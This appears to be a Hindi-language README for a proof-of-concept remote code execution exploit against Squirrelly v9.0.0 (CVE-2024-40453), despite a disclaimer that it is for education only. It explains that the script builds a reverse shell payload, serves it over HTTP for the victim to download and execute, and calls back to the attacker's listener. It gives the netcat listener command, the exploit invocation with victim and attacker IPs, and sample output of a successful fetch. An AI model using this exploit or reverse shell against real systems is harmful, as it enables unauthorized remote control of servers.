
CVE-2024-40453 - Squirrelly v9.0.0 RCE. Poc
यह स्क्रिप्ट केवल शैक्षणिक उपयोग के लिए है।
इसका अवैध उद्देश्यों के लिए उपयोग न करें।
यदि आप ऐसा करते हैं, तो यह पूरी तरह से आपकी जिम्मेदारी है; मैं किसी भी दुरुपयोग के लिए उत्तरदायी नहीं हूँ।
यह स्क्रिप्ट वर्तमान निर्देशिका में payload.sh नामक एक रिवर्स शेल बनाती है।
फिर यह पीड़ित द्वारा payload.sh को खींचने के लिए पोर्ट 80 पर एक HTTP सर्वर होस्ट करती है।
हमलावर की मशीन पर एक लिसनर प्रारंभ करने की आवश्यकता होती है।
HTTP सर्वर पीड़ित को payload.sh खींचने और निष्पादित करने की अनुमति देने के लिए 3 सेकंड के बाद बंद हो जाता है।
निम्नलिखित जानकारी के आधार पर, यह POC विकसित किया गया था। https://samuzora.com/posts/cve-2024-40453
अपना लिसनर प्रारंभ करें
rlwrap nc -nvlp 3000
पेलोड निष्पादित करें
# python3 poc.py -rhost <VICTIM_IP> -rport <VICTIM_PORT> -lhost <ATTACKER_IP> -lport <ATTACKER_LISTENER_PORT>
python3 poc.py -rhost 172.16.0.2 -rport 3000 -lhost 172.16.0.1 -lport 3000
[+] Payload created at payload.sh
[*] Hosting HTTP server on port 80
[*] Triggering remote execution
172.16.0.2 - - [13/Jun/2025 22:21:10] "GET /payload.sh HTTP/1.1" 200 -
[*] Shutting down HTTP server on port 80
[!] Check your listener!